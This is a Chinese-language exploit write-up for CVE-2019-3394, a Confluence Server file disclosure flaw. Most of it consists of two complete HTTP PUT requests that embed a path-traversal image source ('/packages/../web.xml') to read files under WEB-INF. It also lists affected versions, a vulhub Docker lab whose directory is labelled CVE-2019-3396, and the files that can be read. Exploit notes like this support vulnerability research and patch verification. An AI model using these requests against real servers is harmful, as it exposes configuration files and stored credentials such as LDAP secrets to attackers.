Home

Awesome

CVE-2019-3394

Confluence(install-directory>/confluence/WEB-INF/)文件读取漏洞

BurpSuite Request

vuln_url http://10.10.20.166:8090/rest/api/content/65610?status=draft

PUT /rest/api/content/65610?status=draft HTTP/1.1
Host: 10.10.20.166:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://10.10.20.166:8090/pages/resumedraft.action?draftId=65610&draftShareId=58f4ea64-a2bd-473d-93ce-157cf3c229f3
Content-Length: 490
Cookie: JSESSIONID=FFD0CA6A6268E12E69A566AAD965B17A
X-Forwarded-For: 127.0.0.1
Connection: close

{"status":"current","title":"test","space":{"key":"JAS"},"body":{"editor":{"value":"<p><img class=\"confluence-embedded-image confluence-external-resource\" style=\"max-height: 250px;\" src=\"http://10.10.20.166:8090/packages/../web.xml\" data-image-src=\"/packages/../web.xml\" /></p>","representation":"editor","content":{"id":"65610"}}},"id":"65610","type":"page","version":{"number":1,"minorEdit":true,"syncRev":"0.mlIer8AOrlZcj7dg7IWDwUc.5"},"ancestors":[{"id":"65586","type":"page"}]}

change

src=\"http://10.10.20.166:8090/packages/../web.xml\"

to

src=\"/packages/../web.xml\"

PUT /rest/api/content/65610?status=draft HTTP/1.1
Host: 10.10.20.166:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://10.10.20.166:8090/pages/resumedraft.action?draftId=65610&draftShareId=58f4ea64-a2bd-473d-93ce-157cf3c229f3
Content-Length: 490
Cookie: JSESSIONID=FFD0CA6A6268E12E69A566AAD965B17A
X-Forwarded-For: 127.0.0.1
Connection: close

{"status":"current","title":"test","space":{"key":"JAS"},"body":{"editor":{"value":"<p><img class=\"confluence-embedded-image confluence-external-resource\" style=\"max-height: 250px;\" src=\"/packages/../web.xml\" data-image-src=\"/packages/../web.xml\" /></p>","representation":"editor","content":{"id":"65610"}}},"id":"65610","type":"page","version":{"number":1,"minorEdit":true,"syncRev":"0.mlIer8AOrlZcj7dg7IWDwUc.5"},"ancestors":[{"id":"65586","type":"page"}]}

0x00 简介

Confluence Server 和 Data Center 在页面导出功能中存在本地文件泄露漏洞:具有“添加页面”空间权限的远程攻击者,能够读取 <install-directory>/confluence/WEB-INF/ 目录下的任意文件。 该目录可能包含用于与其他服务集成的配置文件,可能会泄漏认证凭据,例如 LDAP 认证凭据或其他敏感信息。

漏洞影响版本:

6.1.0 <= version < 6.6.16 6.7.0 <= version < 6.13.7 6.14.0 <= version < 6.15.8

0x01 CVE-2019-3394漏洞复现过程

测试环境: Atlassian Confluence 6.10.2

root@kali:~/vulhub/confluence/CVE-2019-3396# docker-compose up -d

  root@kali:~/vulhub/confluence/CVE-2019-3396# docker-compose up -d
cve-2019-3396_db_1 is up-to-date
cve-2019-3396_web_1 is up-to-date
root@kali:~/vulhub/confluence/CVE-2019-3396# docker ps -a
CONTAINER ID        IMAGE                              COMMAND                  CREATED             STATUS              PORTS                                            NAMES
ab287d68d994        vulhub/confluence:6.10.2           "/docker-entrypoint.…"   2 hours ago         Up 2 hours          0.0.0.0:8090->8090/tcp, 8091/tcp                 cve-2019-3396_web_1
1f58f73d5349        postgres:10.7-alpine               "docker-entrypoint.s…"   2 hours ago         Up 2 hours          5432/tcp                                         cve-2019-3396_db_1

/opt/atlassian/confluence/confluence/WEB-INF

目录下的文件

./admin/longrunningtask-xml.vm
./WEB-INF/glue-config.xml
./WEB-INF/urlrewrite.xml
./WEB-INF/web.xml
./WEB-INF/decorators.xml
./WEB-INF/sitemesh.xml
./WEB-INF/lib/batik-xml-1.9.jar
./WEB-INF/lib/xml-apis-ext-1.3.04.jar
./WEB-INF/lib/atlassian-secure-xml-3.2.11.jar
./WEB-INF/lib/xmlrpc-supplementary-character-support-0.2.jar
./WEB-INF/lib/xmlgraphics-commons-2.2.jar
./WEB-INF/lib/xmlrpc-2.0+xmlrpc61.1+sbfix.jar
./WEB-INF/classes/seraph-config.xml
./WEB-INF/classes/seraph-paths.xml
./importexport/includes/export-xml.vm
./search/osd.xml
./META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml

参考链接:

https://github.com/vulhub/vulhub/blob/master/confluence/CVE-2019-3396/README.md